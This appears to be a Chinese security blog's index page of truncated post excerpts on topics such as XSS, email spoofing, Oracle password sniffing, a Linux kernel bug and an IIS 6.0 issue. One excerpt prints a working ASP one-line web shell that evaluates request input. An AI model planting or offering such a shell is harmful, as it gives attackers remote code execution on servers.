作者：cnqing 来源：cncertCTProxy beta 软件功能： 可自定义HTTP头的本地代理，源于WVS的HttpSniff(Trap) 使用方法： 1.设置代理端口 ...

作者：云舒最近比较流行猥琐流客户端攻击方法，不过都是以XSS等WEB方面的攻击为主。趁这个机会，我顺便把邮件欺诈这个也比较猥琐的老问题拿 出来说一说。问题虽老，但是用来结合社会工程...

> Linux NULL pointer dereference due to incorrect proto_ops initializations > > &...

鬼仔注：以前有过类似的文章，在 这篇文章 的尾部有猪三以前写的“注射过程中DB_ONER权限并且主机与数据库不在一起的搞法”。

信息来源：Tr4c3It’s now possible for us to do sniffing oracle 11g password and cracking at the ...

原文：milw0rm.com 作者：Xylitol 翻译：老臧 首发：http://lovelaozang.cn摘要： 1>什么是XSS? 2>XSS脚本攻击 3>...

来源：s0n9 '5 b109<%eval(request("a")):response.end%> 备分专用一句话 加个response....

/* dedicated to my best friend in the whole world, Robin Price the joke is in your handsju...

作者：刺标准也很无奈，标准很难做到 Secure By Default。最新的W3C标准里是这么实现HTTP跨域请求的， Cross-Origin Resource Sharing...

作者：MJ0011 (tyjaaa_at_163.com) 来源：安全焦点使用如下代码可将系统中的atapi.sys (如果你的机器磁盘PORT驱动是atapi.sys的话，如果是...

鬼仔注：刚在H4x0r那里看到的，很简单的英文，不会英文的，根据里面几个URL和关键字也应该能看出来什么意思，必须要求IIS 6.0，跟前段时间动易那个一样，利用Windows 2...

============================================================ Wordpress Plugin WP-Syntax &l...